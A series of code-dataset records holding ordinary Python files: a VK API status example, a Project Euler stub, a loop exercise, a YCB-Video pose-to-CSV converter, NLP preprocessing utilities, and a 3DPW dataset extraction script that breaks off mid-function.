+{"seq_id":"124711838","text":"#part_1 VK_API\n\nimport requests\nfrom urllib.parse import urlencode\n\n\nAUTHORIZED_URL = 'https://oauth.vk.com/authorize'\nAPP_ID = '6256742'\nVERSION = '5.69'\n\nauth_data = {\n    'client_id': APP_ID,\n    'redirect_uri': 'https://oauth.vk.com/blank.html',\n    'display': 'page',\n    'scope': 'status, friends',\n    'response_type': 'token',\n    'v': VERSION\n}\n\n\nprint('?'.join(\n    (AUTHORIZED_URL, urlencode(auth_data))\n))\n\nTOKEN = ''\n\nparams = {\n    'access_token': TOKEN,\n    'v': VERSION,\n}\n\n\nresponse = requests.get('https://api.vk.com/method/status.get', params)\nprint(response.text)\n# response_text = response.text\n# print (response.text, type(response.text))\n# response_text['response']\n# response_json = response.json()\n# print(response_json, type(response_json))\n# response_json['response']\n# print(response.status_code)\n\n# params['text'] = 'set status from python'\n#                  ''\n# responce = requests.get('', params)\n# responce_json = responce.json()\n# print(responce_json, type(responce_json))\n","sub_path":"Homework_3.4/Lecture_.py","file_name":"Lecture_.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"400943010","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nProject Euler Problem 293\n=======================\n\nAn even positive integer N will be called admissible, if it is a power of\n2 or its distinct prime factors are consecutive primes.\nThe first twelve admissible numbers are 2,4,6,8,12,16,18,24,30,32,36,48.\n\nIf N is admissible, the smallest integer M > 1 such that N+M is prime,\nwill be called the pseudo-Fortunate number for N.\n\nFor example, N=630 is admissible since it is even and its distinct prime\nfactors are the consecutive primes 2,3,5 and 7.\nThe next prime number after 631 is 641; hence, the pseudo-Fortunate number\nfor 630 is M=11.\nIt can also be seen that the pseudo-Fortunate number for 16 is 3.\n\nFind the sum of all distinct pseudo-Fortunate numbers for admissible\nnumbers N less than 10^9.\n\n\"\"\"\n\n\ndef main():\n    return \"unimplemented\"\n\n\nif __name__ == \"__main__\":\n    import ntpath\n    import time\n    from common.shared_functions import verify_solution\n\n    problem_number = int(ntpath.basename(__file__).replace(\"euler\", \"\").replace(\".py\", \"\"))\n    print(\"Retrieving my answer to Euler Problem {0} ...\".format(problem_number))\n\n    ts = time.time()\n    my_answer = main()\n    te = time.time()\n\n    print(\"My answer: {1}\".format(problem_number, my_answer))\n\n    verification_type = verify_solution(problem_number, my_answer)\n    print(\"Verification: {0}\".format(verification_type.name))\n    print(\"Took {0} seconds.\".format(te - ts))\n","sub_path":"project-euler/solvers/euler293.py","file_name":"euler293.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"236056642","text":"#Nessa sintaxe  quando o else pertencer ao FOR ir aexecutar a msg final depois que procurar tudo\n#!/usr/bin/python3\nnomes = ['vanice','juliana','carol']\nbusca = input('Digite um nome:  ')\n\nfor nome in nomes:\n    if busca.lower().strip() == nome:\n        print('achei')\n        break\nelse:\n    print('não achei')      \n","sub_path":"Aula2/loop76.py","file_name":"loop76.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"59029316","text":"import scipy.io\nimport numpy as np\nimport glob\nimport os\n\nPATH = \"/home/ma/masterthesis/datasets/YCB_Video_Dataset/train/\"\nos.mkdir(PATH+\"rotation\")\npaths = glob.glob(PATH + \"meta/*\")\nfor path in paths:\n    name, _ = os.path.splitext(os.path.basename(path))\n    mat = scipy.io.loadmat(path)\n    res = [[v for v in np.concatenate((mat[\"cls_indexes\"][i], mat[\"poses\"][:,:3,i].flatten()))] for i in range(len(mat[\"cls_indexes\"]))]\n    str = \"\"\n    for row in res:\n        for v in row:\n            str += \"%s,\" % v\n        str = str[:-1]\n        str += \"\\n\"\n    with open(PATH + \"rotation/\" + name + \".csv\", \"w\") as fh:\n        fh.write(str)","sub_path":"make_csvs.py","file_name":"make_csvs.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"376574701","text":"import os\nimport re\nimport jieba\nimport pkuseg\nimport chardet\nimport zipfile\nimport unicodedata\n# import MeCab\nimport tinysegmenter\nimport numpy as np\nfrom gensim import corpora\nimport tensorflow_datasets as tfds\nfrom six.moves.urllib.request import urlretrieve\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import SnowballStemmer\nfrom lib.preprocess.zh_hans.langconv import Converter\n\nTOKEN_START = ''\nTOKEN_END = ''\nTOKEN_CLS = ''\nTOKEN_PAD = ''\nTOKEN_UNK = ''  # for unknown words\n\n__ps = PorterStemmer()\n__ss = SnowballStemmer('romanian')\n\n\ndef download(url, file_path):\n    \"\"\" download data \"\"\"\n    dir_path = os.path.splitext(file_path)[0]\n    if os.path.exists(dir_path) or os.path.exists(file_path):\n        # print('%s exists' % file_path)\n        return\n\n    def progress(count, block_size, total_size):\n        print('\\r>> Download %.2f%% ' % (float(count * block_size) / total_size * 100.), end='')\n\n    print('Start downloading from %s ' % url)\n    new_file_path, _ = urlretrieve(url, file_path, reporthook=progress)\n    stat_info = os.stat(new_file_path)\n    print('\\nSuccessfully download from %s %d bytes' % (url, stat_info.st_size))\n\n\ndef unzip_and_delete(file_path):\n    \"\"\" unzip files \"\"\"\n\n    new_dir_path = os.path.splitext(file_path)[0]\n    if os.path.exists(new_dir_path):\n        # print('%s has been unzip' % file_path)\n        return\n    os.mkdir(new_dir_path)\n\n    print('\\nStart unzipping data ... ')\n\n    zip_file = zipfile.ZipFile(file_path)\n    for names in zip_file.namelist():\n        zip_file.extract(names, new_dir_path)\n    zip_file.close()\n\n    # delete the zip file\n    os.remove(file_path)\n\n    print('Finish unzipping \\n')\n\n\ndef unicode_to_ascii(s):\n    return ''.join(c for c in unicodedata.normalize('NFD', s) if unicodedata.category(c) != 'Mn')\n\n\ndef full_2_half(string):\n    ss = []\n    for s in string:\n        rstring = \"\"\n        for uchar in s:\n            inside_code = ord(uchar)\n            # 全角空格直接转换\n            if inside_code == 12288:\n                inside_code = 32\n\n            # 全角字符(除空格)根据关系转化\n            elif 65281 <= inside_code <= 65374:\n                inside_code -= 65248\n            rstring += chr(inside_code)\n        ss.append(rstring)\n    return ''.join(ss)\n\n\ndef decode_2_utf8(string):\n    if not isinstance(string, bytes):\n        return string\n\n    try:\n        return string.decode('utf-8')\n    except:\n        encoding = chardet.detect(string)['encoding']\n        if encoding:\n            try:\n                return string.decode(encoding)\n            except:\n                pass\n        return string\n\n\ndef read_lines(file_path):\n    \"\"\" read files and return a list of every line in the file; each line would be decoded to utf8 \"\"\"\n    with open(file_path, 'rb') as f:\n        content = f.readlines()\n    return list(map(lambda x: full_2_half(unicode_to_ascii(decode_2_utf8(x))).strip(), content))\n\n\ndef zh_word_seg_by_pku(list_of_sentences, user_dict=[]):\n    \"\"\"\n    Tokenize Chinese words by pkuseg\n    :params\n        list_of_sentences (list): [ sentence_a (str), sentence_b (str), ... ]\n        user_dict (list): customized dictionary, e.g., [ '你好', '朋友', ... ]\n    \"\"\"\n    user_dict = user_dict if user_dict else 'default'\n    seg = pkuseg.pkuseg(user_dict)\n    return list(map(lambda x: seg.cut(x), list_of_sentences))\n\n\ndef zh_word_seg_by_jieba(list_of_sentences):\n    \"\"\" Tokenize Chinese words by jieba \"\"\"\n    return list(map(lambda x: list(jieba.cut(x)), list_of_sentences))\n\n\ndef jr_word_seg_by_mecab(list_of_sentences):\n    \"\"\" Tokenize japanese words by mecab \"\"\"\n    segmenter = tinysegmenter.TinySegmenter()\n    return list(map(lambda x: list(segmenter.tokenize(x)), list_of_sentences))\n\n\ndef en_word_seg_by_nltk(list_of_sentences):\n    \"\"\" tokenize English words by NLTK \"\"\"\n    return list(map(lambda x: word_tokenize(x), list_of_sentences))\n\n\ndef char_seg(list_of_sentences):\n    \"\"\" tokenize sentence to character level \"\"\"\n    return list(map(lambda x: list(x), list_of_sentences))\n\n\ndef train_subword_tokenizer_by_tfds(list_of_sentences, vocab_size=2 ** 13, max_subword_len=20, reserved_tokens=None):\n    return tfds.features.text.SubwordTextEncoder.build_from_corpus(\n        list_of_sentences,\n        target_vocab_size=vocab_size,\n        max_subword_length=max_subword_len,\n        reserved_tokens=reserved_tokens,\n    )\n\n\ndef encoder_string_2_subword_idx_by_tfds(tokenizer, list_of_sentences):\n    \"\"\"\n    encode string to subword idx\n    :param\n        tokenizer (tfds object): a subword tokenizer built from corpus by tfds\n        list_of_sentences (list): [\n          'Hello, I am a student',\n          'You are my friends',\n          ...\n        ]\n    :return\n        list_of_list_token_idx (list): [\n            [12, 43, 2, 346, 436, 87, 876],   # correspond to ['He', 'llo', ',', 'I', 'am', 'stu', 'dent'],\n            [32, 57, 89, 98, 96, 37],         # correspond to ['You', 'are', 'my', 'fri', 'end', 's'],\n            ...\n        ]\n    \"\"\"\n    return list(map(lambda x: tokenizer.encode(x), list_of_sentences))\n\n\ndef decode_subword_idx_2_string_by_tfds(tokenizer, list_of_list_token_idx):\n    \"\"\"\n    decode subword_idx to string\n    :param\n        tokenizer (tfds object): a subword tokenizer built from corpus by tfds\n        list_of_list_token_idx (list): [\n            [12, 43, 2, 346, 436, 87, 876],   # correspond to ['He', 'llo', ',', 'I', 'am', 'stu', 'dent'],\n            [32, 57, 89, 98, 96, 37],         # correspond to ['You', 'are', 'my', 'fri', 'end', 's'],\n            ...\n        ]\n    :return\n        list_of_sentences (list): [\n          'Hello, I am a student',\n          'You are my friends',\n          ...\n        ]\n    \"\"\"\n    return list(map(lambda x: tokenizer.decode(x), list_of_list_token_idx))\n\n\ndef decode_subword_idx_2_tokens_by_tfds(tokenizer, list_of_list_token_idx):\n    \"\"\"\n    decode subword_idx to string\n    :param\n        tokenizer (tfds object): a subword tokenizer built from corpus by tfds\n        list_of_list_token_idx (list): [\n            [12, 43, 2, 346, 436, 87, 876],   # correspond to ['He', 'llo', ',', 'I', 'am', 'stu', 'dent'],\n            [32, 57, 89, 98, 96, 37],         # correspond to ['You', 'are', 'my', 'fri', 'end', 's'],\n            ...\n        ]\n    :return\n        list_of_list_token (list): [\n            ['He', 'llo', ',', 'I', 'am', 'stu', 'dent'],\n            ['You', 'are', 'my', 'fri', 'end', 's'],\n            ...\n        ]\n    \"\"\"\n    # return list(map(lambda x: list(map(lambda a: tokenizer.decode([a]), x)), list_of_list_token_idx))\n    return list(map(lambda x: list(map(\n        lambda a: tokenizer.decode([a]) if a <= tokenizer.vocab_size else ' ',\n        x\n    )), list_of_list_token_idx))\n\n\ndef doc_2_idx(list_of_doc, dictionary=None, keep_n=5000):\n    \"\"\"\n    convert words to token index\n    :param\n      list_of_doc (list): [\n        ['hello', ',', 'I', 'am', 'a', 'student', '.'],\n        ['you', 'are', 'my', 'friend', '.'],\n        ...\n      ],\n      dictionary (gensim.corpora.Dictionary): default value is None. The dictionary\n        will be generated automatically if it is None.\n      keep_n (int): only keep the most frequent n words in the dictionary\n    \"\"\"\n    if isinstance(dictionary, type(None)):\n        dictionary = corpora.Dictionary(list_of_doc)\n        if len(dictionary) > keep_n:\n            dictionary.filter_extremes(no_below=0, no_above=1.1, keep_n=keep_n)\n    list_of_doc = list(map(lambda x: dictionary.doc2idx(x), list_of_doc))\n    return list_of_doc, dictionary\n\n\ndef idx_2_doc(list_of_list_token_idx, dictionary):\n    \"\"\" decode list_of_list_token_idx to list_of_list_token \"\"\"\n    return list(map(\n        lambda x: list(map(lambda a: dictionary.get(a) if dictionary.get(a) else TOKEN_UNK, x)),\n        list_of_list_token_idx\n    ))\n\n\ndef join_list_token_2_string(list_of_list_token, delimiter=''):\n    \"\"\" join the list tokens to string \"\"\"\n    return list(map(lambda x: delimiter.join(x), list_of_list_token))\n\n\ndef remove_space(list_of_sentence):\n    return list(map(lambda x: x.replace(' ', ''), list_of_sentence))\n\n\ndef add_start_end_token_2_list_token(list_of_list_token):\n    \"\"\" add  and  tokens to the start and the end of list_token respectively \"\"\"\n    return list(map(lambda x: [TOKEN_START] + x + [TOKEN_END], list_of_list_token))\n\n\ndef add_pad_token_2_list_token(list_of_list_token, max_seq_len):\n    \"\"\" add multiple  tokens to the tail of the list_token\n            so that the length of list_token equal to max_seq_len \"\"\"\n    fix_len_list_of_list_token = []\n\n    for list_token in list_of_list_token:\n        after_pad_list_token = list_token + [TOKEN_PAD] * (max_seq_len - len(list_token))\n        fix_len_list_of_list_token.append(after_pad_list_token)\n\n    return fix_len_list_of_list_token\n\n\ndef filter_exceed_max_seq_len(list_of_list_token, max_seq_len):\n    \"\"\" filter sentences which exceed max_seq_len \"\"\"\n    fix_len_list_of_list_token = []\n    for list_token in list_of_list_token:\n        if len(list_token) <= max_seq_len:\n            fix_len_list_of_list_token.append(list_token)\n    return fix_len_list_of_list_token\n\n\ndef filter_exceed_max_seq_len_for_cross_lingual(list_of_list_src_token, list_of_list_tar_token,\n                                                max_src_seq_len, max_tar_seq_len):\n    \"\"\" filter sentences which exceed max_seq_len for two languages at the same time \"\"\"\n    fix_len_list_of_list_src_token = []\n    fix_len_list_of_list_tar_token = []\n    for i, list_src_token in enumerate(list_of_list_src_token):\n        list_tar_token = list_of_list_tar_token[i]\n        if len(list_src_token) > max_src_seq_len or len(list_tar_token) > max_tar_seq_len:\n            continue\n        fix_len_list_of_list_src_token.append(list_src_token)\n        fix_len_list_of_list_tar_token.append(list_tar_token)\n\n    return fix_len_list_of_list_src_token, fix_len_list_of_list_tar_token\n\n\ndef filter_exceed_max_seq_len_together(max_seq_len, index, *args):\n    \"\"\" filter data which exceed max_seq_len \"\"\"\n    data = list(zip(*args))\n    new_data = []\n    for val in data:\n        list_token = val[index]\n        if len(list_token) <= max_seq_len:\n            new_data.append(val)\n    return list(zip(*new_data))\n\n\ndef add_start_end_token_2_string(list_of_sentences):\n    \"\"\" add   token to string \"\"\"\n    return list(map(lambda x: TOKEN_START + ' ' + x + ' ' + TOKEN_END, list_of_sentences))\n\n\ndef add_start_end_token_idx_2_list_token_idx(list_of_list_token_idx, vocab_size, incr=0):\n    \"\"\" add the start token idx (vocab_size + 1) and the end token idx (vocab_size + 2) to list_token_idx \"\"\"\n    return list(map(lambda x: [vocab_size + 1 + incr] + x + [vocab_size + incr + 2], list_of_list_token_idx))\n\n\ndef add_pad_token_idx_2_list_token_idx(list_of_list_token_idx, max_seq_len):\n    \"\"\" add the pad token idx (0) \"\"\"\n    fix_len_list_of_list_token_idx = []\n    pad_idx = 0\n\n    for list_token_idx in list_of_list_token_idx:\n        after_pad_list_token_idx = list_token_idx + [pad_idx] * (max_seq_len - len(list_token_idx))\n        fix_len_list_of_list_token_idx.append(after_pad_list_token_idx)\n\n    return fix_len_list_of_list_token_idx\n\n\ndef remove_out_of_vocab_token_idx(list_of_list_token_idx, vocab_size):\n    \"\"\" remove the out of vocabulary token idx (idx for , , ) \"\"\"\n    return list(map(lambda x: [v for v in x if v < vocab_size], list_of_list_token_idx))\n\n\ndef remove_some_token_idx(list_of_list_token_idx, remove_idx_list):\n    \"\"\" remove the out of vocabulary token idx (idx for , , ) \"\"\"\n    return list(map(lambda x: [v for v in x if v not in remove_idx_list], list_of_list_token_idx))\n\n\ndef convert_minus_1_to_unknown_token_idx(list_of_list_token_idx, vocab_size, incr=0):\n    \"\"\" convert the -1 to vocab_size + incr (because for the unknown words, the dictionary may convert it to -1) \"\"\"\n    return list(map(lambda x: list(map(lambda a: a if a != -1 else (vocab_size + incr), x)), list_of_list_token_idx))\n\n\ndef convert_list_of_list_token_idx_2_string(list_of_list_token_idx):\n    return list(map(lambda x: list(map(str, x)), list_of_list_token_idx))\n\n\ndef pipeline(preprocess_pipeline, lan_data_1, lan_data_2=None, params={}, verbose=True):\n    \"\"\"\n    preprocess the data according to the preprocess_pipeline\n    :params\n        preprocess_pipeline (list): a list of preprocessing functions\n            the format must be: [\n                {\n                    'name': 'add_pad_token_idx_to_en', # whatever you name it, just for display\n                    'func': utils.add_pad_token_idx_2_list_token_idx, # the func that will be executed\n                    'input_keys': ['input_2', 'en_vocab_size', 'max_tar_seq_len', 0],\n                        # generate the args for func according to the input_keys;\n                    'output_keys': ['input_2'],\n                        # record the output of the func to the result_dict according to the output_keys\n                },\n                ...\n            ]\n        lan_data_1 (list): list of sentences of language 1\n            e.g., [ 'I am a boy', 'you are a girl.' ]\n        lan_data_2 (list):  list of sentences of language 2\n            e.g., [ 'I am a boy', 'you are a girl.' ]\n        params (dict): pass parameters that functions in the pipeline may need\n        verbose (bool): whether or not to print information\n    \"\"\"\n    # share variables when applying different preprocess functions\n    result_dict = {**params, 'input_1': lan_data_1, 'input_2': lan_data_2}\n\n    # traverse the pipeline\n    for func_dict in preprocess_pipeline:\n        # for the last func of the pipeline; the last func would only contains the 'output_keys' for the return values\n        if 'func' not in func_dict:\n            continue\n\n        if 'params' in func_dict:\n            for k, v in func_dict['params'].items():\n                result_dict[k] = v\n\n        # get variables\n        name = func_dict['name']\n        func = func_dict['func']\n        args = [result_dict[key] if isinstance(key, str) and key in result_dict else key\n                for key in func_dict['input_keys']]\n        output_keys = func_dict['output_keys']\n        show_dict = {} if 'show_dict' not in func_dict else func_dict['show_dict']\n\n        # apply preprocess function\n        if verbose:\n            print('preprocessing %s ...' % name)\n        outputs = func(*args)\n\n        # record output to result_dict\n        if isinstance(output_keys, str):\n            result_dict[output_keys] = outputs\n        elif len(output_keys) == 1:\n            result_dict[output_keys[0]] = outputs\n        else:\n            for i, key in enumerate(output_keys):\n                result_dict[key] = outputs[i]\n\n        # for display\n        if verbose:\n            for k, v in show_dict.items():\n                v = result_dict[v]\n                tmp_v = v[:2] if isinstance(v, list) or isinstance(v, np.ndarray) or isinstance(v, tuple) else v\n                print('{}: {}'.format(k, tmp_v))\n\n    # return output according to the last element's output_keys\n    last_output_keys = preprocess_pipeline[-1]['output_keys']\n    if isinstance(last_output_keys, str):\n        return result_dict[last_output_keys]\n    elif len(last_output_keys) == 1:\n        return result_dict[last_output_keys]\n    return [result_dict[key] for key in last_output_keys]\n\n\ndef analyze(lan_data, lan_name, bin_size=50):\n    import numpy as np\n    import matplotlib.pyplot as plt\n\n    len_list = list(map(len, lan_data))\n    print('\\nmean length of {}: {}\\nmax length of {}: {}\\n'\n          'min length of {}: {}\\nstd length of {}: {}\\n'.format(\n        lan_name, np.mean(len_list), lan_name, np.max(len_list),\n        lan_name, np.min(len_list), lan_name, np.std(len_list)))\n\n    plt.hist(len_list, bins=bin_size, edgecolor='#E6E6E6')\n    plt.title('histogram of length of {}'.format(lan_name))\n    plt.xlabel('length (num of tokens in a sentence)')\n    plt.ylabel('size')\n    plt.grid(linestyle='dashed')\n    plt.show()\n\n\ndef combine_multi_space(list_of_sentences):\n    reg = re.compile(r'\\s+')\n    return list(map(lambda x: reg.sub(' ', x), list_of_sentences))\n\n\n__reg_quot = re.compile(r\"(?<\\[\\]{}《》【】()()]+')\n__reg_space = re.compile(r\"[^\\da-zA-Z?.!,_\\-;:'\\u4e00-\\u9fa5\\u30a0-\\u30ff\\u3040-\\u309f\\u3000-\\u303f\\ufb00-\\ufffd]+\")\n__reg_num_space = re.compile(r'(\\d+)\\s+(\\d+)')\n__reg_num_spot = re.compile(r'(\\d+)\\s+\\.\\s+(\\d+)')\n\n\ndef remove_special_chars(string):\n    # convert chinese punctuations to english punctuations\n    string = string.replace(',', ',').replace('。', '.').replace('!', '!').replace('?', '?'). \\\n        replace(':', ':').replace(';', ';').replace(';', '.').replace('“', '\"').replace('”', '\"')\n    # .replace('「', '[').replace('」', ']').replace('、', ',')\n\n    # insert space to the front of the delimiter\n    string = __reg_delimiter.sub(r' \\1 ', string)\n    string = __reg_spot.sub(r' \\1 ', string)\n\n    # concat noise numbers\n    tmp_string = __reg_num_space.sub(r'\\1\\2', string)\n    while tmp_string != string:\n        string = tmp_string\n        tmp_string = __reg_num_space.sub(r'\\1\\2', string)\n    string = __reg_num_spot.sub(r'\\1.\\2', string)\n\n    # replace some special chars to space\n    string = __reg_split.sub(' ', string)\n\n    # remove quote\n    string = __reg_quot.sub(' ', string)\n\n    # replace everything except normal chars to space\n    string = __reg_space.sub(' ', string)\n\n    string = string.strip()\n\n    # if end punctuation is , or ;\n    if string and string[-1] in [',', ';']:\n        string = string[:-1] + '.'\n\n    # if no end punctuations, add one\n    if string and string[-1] not in ['.', ',', '?', '!', ';'] and len(string.split(' ')) > 3:\n        string += ' .'\n    return string\n\n\ndef remove_noise_for_sentences(list_of_sentences):\n    return list(map(remove_special_chars, list_of_sentences))\n\n\ndef stat_en_words(en_sentences):\n    return sum(list(map(lambda x: len(x.split(' ')), en_sentences)))\n\n\n__reg_sent_delimiter = re.compile(r'[.!?。!?;;](?!\\d)')\n__reg_num = re.compile('^\\d+$')\n__reg_num_end = re.compile('\\d+$')\n\n\ndef split_sentences(src_sentences, tar_sentences):\n    sentences = list(zip(src_sentences, tar_sentences))\n    new_sentences = []\n    remove_indices = []\n    for index, (src_sent, tar_sent) in enumerate(sentences):\n        src_l = __reg_sent_delimiter.split(src_sent)\n        tar_l = __reg_sent_delimiter.split(tar_sent)\n\n        if not src_l or not tar_l:\n            continue\n\n        if not src_l[-1].strip():\n            src_l = src_l[:-1]\n\n        if not tar_l[-1].strip():\n            tar_l = tar_l[:-1]\n\n        src_delimiters = __reg_sent_delimiter.findall(src_sent)\n        tar_delimiters = __reg_sent_delimiter.findall(tar_sent)\n\n        if len(src_l) != len(tar_l):\n            remove_indices.append(index)\n            if len(src_delimiters) == 1:\n                tar_sent = __reg_sent_delimiter.sub(',', tar_sent, count=len(tar_delimiters) - 1)\n                sentences[index] = (src_sent, tar_sent)\n            if len(tar_delimiters) == 1:\n                src_sent = __reg_sent_delimiter.sub(',', src_sent, count=len(src_delimiters) - 1)\n                sentences[index] = (src_sent, tar_sent)\n            continue\n\n        if len(src_l) <= 1:\n            continue\n\n        cur = len(src_l) - 1\n        while cur > 0:\n            if __reg_num.search(src_l[cur]) and __reg_num.search(tar_l[cur]) and \\\n                    __reg_num_end.search(src_l[cur - 1]) and __reg_num_end.search(tar_l[cur - 1]) and \\\n                    src_delimiters[cur - 1] == '.':\n                src_l[cur - 1] += '.' + src_l[cur]\n                tar_l[cur - 1] += '.' + tar_l[cur]\n                del src_delimiters[cur - 1]\n                cur -= 1\n            cur -= 1\n\n        if len(src_l) <= 1 or abs(len(src_l[0].split(' ')) - len(tar_l[0].split(' '))) > 5:\n            continue\n\n        new_sentences += [(\n            str(src_l[i] + (src_delimiters[i] if len(src_delimiters) - 1 >= i else '')).strip(),\n            str(tar_l[i] + src_delimiters[i] if len(src_delimiters) - 1 >= i else '').strip()\n        ) for i in range(len(src_l)) if i > 0]\n        sentences[index] = (str(src_l[0] + src_delimiters[0]).strip(), str(tar_l[0] + src_delimiters[0]).strip())\n\n    remove_indices.sort(reverse=True)\n    for index in remove_indices:\n        del sentences[index]\n\n    sentences += new_sentences\n    src_sentences, tar_sentences = list(zip(*sentences))\n\n    return list(src_sentences), list(tar_sentences)\n\n\ndef lower_sentences(list_of_sentences):\n    return list(map(lambda x: x.lower(), list_of_sentences))\n\n\ndef stem(word):\n    return __ps.stem(word)\n\n\ndef stem_ro(word):\n    return __ss.stem(word)\n\n\ndef zh_traditional_2_simplified(sentence):\n    sentence = Converter('zh-hans').convert(sentence)\n    return sentence\n","sub_path":"lib/preprocess/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":21072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"643644486","text":"\n\"\"\"\nThis script is to processing PW3D. Note the processing procedure follows SPIN.\n\n\"\"\"\nimport sys\nsys.path.append('..')\n\nimport os\nimport cv2\nimport numpy as np\nimport pickle\nimport ipdb\nfrom tqdm import tqdm\nimport torch\nfrom utils.geometry import batch_rodrigues\nfrom utils.smpl import SMPL\n\nimport config\n\n# --- predefined variables\ndevice = torch.device('cpu')\nsmpl_male = SMPL(config.SMPL_MODEL_DIR, gender='male', create_transl=False).to(device)\nsmpl_female = SMPL(config.SMPL_MODEL_DIR, gender='female', create_transl=False).to(device)\n# --- predefined variables end\n\ndef projection(smpl, smpl_trans, camPose, camIntrinsics):\n    \"\"\"\n    projection annoted 3D joints to 2D, so that we can obtain GT 2D joints.\n    \"\"\"\n    smpl += smpl_trans\n    smpl = np.concatenate([smpl, np.ones((49, 1))], axis=1)\n    smpl = np.dot(smpl, camPose.T)[:, :3]\n    smpl /= smpl[:, np.newaxis, -1]\n    smpl = np.dot(smpl, camIntrinsics.T)\n    return smpl[:,:2]\n\ndef get_smpl_joints(gt_betas, gt_pose, gender):\n    gt_betas = torch.from_numpy(gt_betas).float().unsqueeze(0)\n    gt_pose = torch.from_numpy(gt_pose).float().unsqueeze(0)\n    gt_joints = smpl_male(global_orient=gt_pose[:,:3], body_pose=gt_pose[:,3:], betas=gt_betas).joints \n    gt_joints_female = smpl_female(global_orient=gt_pose[:,:3], body_pose=gt_pose[:,3:], betas=gt_betas).joints\n    gt_joints[gender==1, :, :] = gt_joints_female[gender==1, :, :]\n    gt_joints = gt_joints.squeeze().numpy()\n    return gt_joints\n\ndef pw3d_extract(dataset_path, out_path, debug=False):\n\n    openpose_coco2common = [10, 9, 8, 11, 12, 13, 4, 3, 2, 5, 6, 7]\n    common2J24 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]\n\n    # scale factor\n    scaleFactor = 1.2\n\n    shape_records = {}\n    person_id = 0\n    oldperson = False\n\n    # get a list of .pkl files in the directory\n    dataset_path = os.path.join(dataset_path, 'sequenceFiles', 'test')\n    files = [os.path.join(dataset_path, f) \n        for f in os.listdir(dataset_path) if f.endswith('.pkl')]\n    # go through all the .pkl files\n    for fi, filename in enumerate(tqdm(files, desc='seq')):\n        with open(filename, 'rb') as f:\n            data = pickle.load(f, encoding='latin1')\n            smpl_pose = data['poses']\n            smpl_betas = data['betas']\n            poses2d = data['poses2d']\n            global_poses = data['cam_poses']\n            genders = data['genders']\n            valid = np.array(data['campose_valid']).astype(np.bool)\n            num_people = len(smpl_pose)\n            num_frames = len(smpl_pose[0])\n            seq_name = str(data['sequence'])\n            img_names = np.array(['imageFiles/' + seq_name + '/image_%s.jpg' % str(i).zfill(5) for i in range(num_frames)])\n            \n            trans = data['trans']\n            cam_Intrinsics = data['cam_intrinsics']\n\n            # get through all the people in the sequence\n            for i in range(num_people):\n                # structs we use\n                imgnames_, scales_, centers_, parts_ = [], [], [], []\n                poses_, shapes_, genders_ = [], [], [] \n                smpl_j3ds_, smpl_j2ds_ = [], []\n\n                valid_pose = smpl_pose[i][valid[i]]\n                valid_betas = np.tile(smpl_betas[i][:10].reshape(1,-1), (num_frames, 1))\n                valid_betas = valid_betas[valid[i]]\n                valid_keypoints_2d = poses2d[i][valid[i]]\n                valid_img_names = img_names[valid[i]]\n                valid_global_poses = global_poses[valid[i]]\n                gender = genders[i]\n\n                # get the person id\n                if fi ==0 and i==0 and person_id == 0:\n                    shape_records[person_id] = smpl_betas[i][:10]\n                    current_person = person_id\n                else:\n                    for hased_personid in shape_records.keys():\n                        if (smpl_betas[i][:10] == shape_records[hased_personid]).all():\n                            print(f'this is person {hased_personid}')\n                            oldperson = True\n                            current_person = hased_personid\n                    if not oldperson:\n                        person_id += 1\n                        shape_records[person_id] = smpl_betas[i][:10]\n                        current_person = person_id\n                    oldperson = False\n\n                valid_trans = trans[i][valid[i]]\n                # consider only valid frames\n                for valid_i in range(valid_pose.shape[0]):\n                    part = valid_keypoints_2d[valid_i,:,:].T\n                    part_ori = part.copy()\n                    part = part[part[:,2]>0,:]\n                    # bbox = [min(part[:,0]), min(part[:,1]),\n                    #     max(part[:,0]), max(part[:,1])]\n                    # center = [(bbox[2]+bbox[0])/2, (bbox[3]+bbox[1])/2]\n                    # scale = scaleFactor*max(bbox[2]-bbox[0], bbox[3]-bbox[1])/200\n                    \n                    # collect 3d joints (smpl format) and 2d joints (49 points)\n                    smpl_j3d = get_smpl_joints(valid_betas[valid_i], valid_pose[valid_i], gender)\n                    smpl_j2d = projection(smpl_j3d, valid_trans[valid_i], valid_global_poses[valid_i], cam_Intrinsics)\n                    smpl_j2d = np.concatenate([smpl_j2d, np.ones((49,1))], axis=1)\n                    bbox = [min(smpl_j2d[:,0]), min(smpl_j2d[:,1]),\n                        max(smpl_j2d[:,0]), max(smpl_j2d[:,1])]\n                    center = [(bbox[2]+bbox[0])/2, (bbox[3]+bbox[1])/2]\n                    scale = scaleFactor*max(bbox[2]-bbox[0], bbox[3]-bbox[1])/200\n\n                    # convert kp2d\n                    j2d = np.zeros([24,3])\n                    part_ori[:, 2] = part_ori[:, 2] > 0.3\n                    j12 = part_ori[openpose_coco2common]\n                    j2d[common2J24,:] = j12[:,:]\n                    # j2d[common2J24,2] = 1\n\n                    # transform global pose\n                    pose = valid_pose[valid_i]\n                    extrinsics = valid_global_poses[valid_i][:3,:3]\n                    pose[:3] = cv2.Rodrigues(np.dot(extrinsics, cv2.Rodrigues(pose[:3])[0]))[0].T[0]                      \n\n                    imgnames_.append(valid_img_names[valid_i])\n                    centers_.append(center)\n                    scales_.append(scale)\n                    poses_.append(pose)\n                    shapes_.append(valid_betas[valid_i])\n                    genders_.append(gender)\n                    parts_.append(j2d)\n                    smpl_j3ds_.append(smpl_j3d)\n                    smpl_j2ds_.append(smpl_j2d)\n\n                # store data\n                if not os.path.isdir(out_path+'/3dpw'):\n                    os.makedirs(out_path+'/3dpw')\n                out_file = os.path.join(out_path,\n                    '3dpw/{}_{}.npz'.format(seq_name, current_person))\n                np.savez(out_file, imgname=imgnames_,\n                                